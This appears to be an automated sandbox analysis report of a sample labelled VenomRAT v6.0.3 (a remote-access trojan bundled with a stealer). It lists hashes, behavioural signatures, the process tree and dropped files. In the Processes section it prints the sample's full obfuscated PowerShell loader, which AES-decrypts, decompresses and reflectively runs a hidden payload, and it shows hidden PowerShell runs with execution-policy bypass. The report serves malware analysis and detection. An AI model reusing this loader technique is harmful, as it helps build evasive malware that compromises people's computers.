Analysis
-
max time kernel
109s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
15-04-2024 16:24
Behavioral task
behavioral1
Sample
VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
Resource
win10v2004-20240611-en
General
-
Target
VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
-
Size
26.1MB
-
MD5
a8776c9984c7b6c4f18bf0505ca939b5
-
SHA1
e23a41b6f03f11d3b6a64d5645fa102f373bd292
-
SHA256
5dbb0f9df5fc34b49f0e284afe9037206c29dd8e50f0adbbcca785dcca89592e
-
SHA512
9ebb8d42d1649cb2b3e97bd703d5daa4b1a87f21949c279335f5b0ee834ef185be473e23f82f0562a0f22c1e54675259113c6555976aee5b5def2087b34a8398
-
SSDEEP
786432:/h9/AxUNfm9O7HYazcKB9rZsiqS+r+/hGykCCU1:/h9YxUNpTYGRQGhGykCC
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 1 IoCs
Processes:
Venom RAT + HVNC + Stealer + Grabber.exepid process 2636 Venom RAT + HVNC + Stealer + Grabber.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2280 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2280 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
Venom RAT + HVNC + Stealer + Grabber.exeVenom RAT + HVNC + Stealer + Grabber.execmd.exedescription pid process target process PID 1736 wrote to memory of 2712 1736 Venom RAT + HVNC + Stealer + Grabber.exe cmd.exe PID 1736 wrote to memory of 2712 1736 Venom RAT + HVNC + Stealer + Grabber.exe cmd.exe PID 1736 wrote to memory of 2712 1736 Venom RAT + HVNC + Stealer + Grabber.exe cmd.exe PID 1736 wrote to memory of 2636 1736 Venom RAT + HVNC + Stealer + Grabber.exe Venom RAT + HVNC + Stealer + Grabber.exe PID 1736 wrote to memory of 2636 1736 Venom RAT + HVNC + Stealer + Grabber.exe Venom RAT + HVNC + Stealer + Grabber.exe PID 1736 wrote to memory of 2636 1736 Venom RAT + HVNC + Stealer + Grabber.exe Venom RAT + HVNC + Stealer + Grabber.exe PID 2636 wrote to memory of 2860 2636 Venom RAT + HVNC + Stealer + Grabber.exe WerFault.exe PID 2636 wrote to memory of 2860 2636 Venom RAT + HVNC + Stealer + Grabber.exe WerFault.exe PID 2636 wrote to memory of 2860 2636 Venom RAT + HVNC + Stealer + Grabber.exe WerFault.exe PID 2712 wrote to memory of 2432 2712 cmd.exe cmd.exe PID 2712 wrote to memory of 2432 2712 cmd.exe cmd.exe PID 2712 wrote to memory of 2432 2712 cmd.exe cmd.exe PID 2712 wrote to memory of 2280 2712 cmd.exe powershell.exe PID 2712 wrote to memory of 2280 2712 cmd.exe powershell.exe PID 2712 wrote to memory of 2280 2712 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2636 -s 5283⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exeFilesize
14.2MB
MD53b3a304c6fc7a3a1d9390d7cbff56634
SHA1e8bd5244e6362968f5017680da33f1e90ae63dd7
SHA2567331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58
SHA5127f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5
-
C:\Users\Admin\AppData\Roaming\Venom.batFilesize
11.9MB
MD504fd97b8a5d2132eee84f856ee0fa938
SHA10d1d515140d76fcd9a2dc7f08f9d7a7d9f8d691a
SHA256bb33e3c94abeda061b89a1d70d2430b74fcc40a81b09c732878939308a676e49
SHA512e5b4e624343b3e9bec048c894ba681a44d8e71735c03445c361f059dc0aeb53afabeee37bb82ea9ad47187d305ecf28c1b6e46a039a1630da08e2488edb00778
-
memory/1736-0-0x000007FEF5573000-0x000007FEF5574000-memory.dmpFilesize
4KB
-
memory/1736-1-0x0000000001070000-0x0000000002A9A000-memory.dmpFilesize
26.2MB
-
memory/1736-2-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmpFilesize
9.9MB
-
memory/1736-19-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmpFilesize
9.9MB
-
memory/2280-24-0x000000001B790000-0x000000001BA72000-memory.dmpFilesize
2.9MB
-
memory/2280-25-0x00000000027E0000-0x00000000027E8000-memory.dmpFilesize
32KB
-
memory/2636-17-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmpFilesize
9.9MB
-
memory/2636-18-0x00000000006C0000-0x00000000014F4000-memory.dmpFilesize
14.2MB
-
memory/2636-26-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmpFilesize
9.9MB
-
memory/2636-28-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmpFilesize
9.9MB